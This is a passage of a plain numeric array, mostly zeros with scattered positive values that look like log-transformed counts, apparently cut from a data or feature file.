0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.295836866004329, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.5553480614894135, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.8918202981106265, 0, 0.0, 0.0, 0.0, 4.605170185988092, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0, 0, \n 12.266590935297321, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0, 0.0,\n 5.924066185063897, 0, 3.1354942159291497, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.1972245773362196, 0.0, 7.200951859620047, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.06534854782536, 0, 0, 4.0943445622221, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 4.962844630259907, 0.0, 0.0, 0, \n 0, 2.1972245773362196, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0, 0, 0.0, 0.0, 0, 0.0,\n 3.8501476017100584, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 0, 0, 0.0, 0.0, 1.0986122886681098, 2.1972245773362196, 0, 0.0, 0.0, \n 4.581130849408909, 0.0, 0, 2.5649493574615367, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 3.6375861597263857, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.0910424533583156, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.5553480614894135, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 8.921925063191328, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.9957322735539913, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 3.367295829986474, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 4.605170185988092, 0.0, 0, 0.0, 10.39720770839918, \n 2.302585092994046, 2.5649493574615367, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, \n 2.9957322735539913, 0, 0, 4.06534854782536, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.295836866004329, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.723585101952381,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.4339872044851467, \n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 